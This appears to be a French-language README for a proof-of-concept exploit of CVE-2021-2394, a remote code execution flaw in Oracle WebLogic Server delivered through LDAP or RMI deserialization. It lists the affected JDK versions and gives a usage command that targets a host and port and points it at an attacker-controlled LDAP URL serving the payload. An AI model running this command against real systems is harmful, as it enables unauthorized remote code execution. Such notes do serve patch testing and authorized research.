
Exploit de preuve de concept pour CVE-2021-2394, une vulnérabilité d'exécution de code à distance dans Oracle WebLogic Server. Utilise la désérialisation LDAP ou RMI pour livrer une charge utile.
POC de CVE-2021-2394
Remarques
Pour l'exploitation basée sur RMI, les versions de JDK concernées sont celles antérieures à 6u132, 7u131 et 8u121. À partir de 8u122 et des versions ultérieures, un mécanisme de liste blanche de désérialisation a été ajouté, désactivant le chargement distant de code RMI. Pour l'exploitation basée sur LDAP, les versions de JDK concernées sont celles antérieures à 6u211, 7u201, 8u191 et 11.0.1. Dans la version 8u191, Oracle a imposé des restrictions sur le vecteur LDAP, publié le CVE-2018-3149, et désactivé le chargement distant de classes JNDI. Source : https://www.freebuf.com/vuls/279465.html
Utilisation :
java -jar CVE_2021_2394.jar rhost rport ldapurljava -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/ExploitLiens de référence :
Mise à jour
Article d'analyse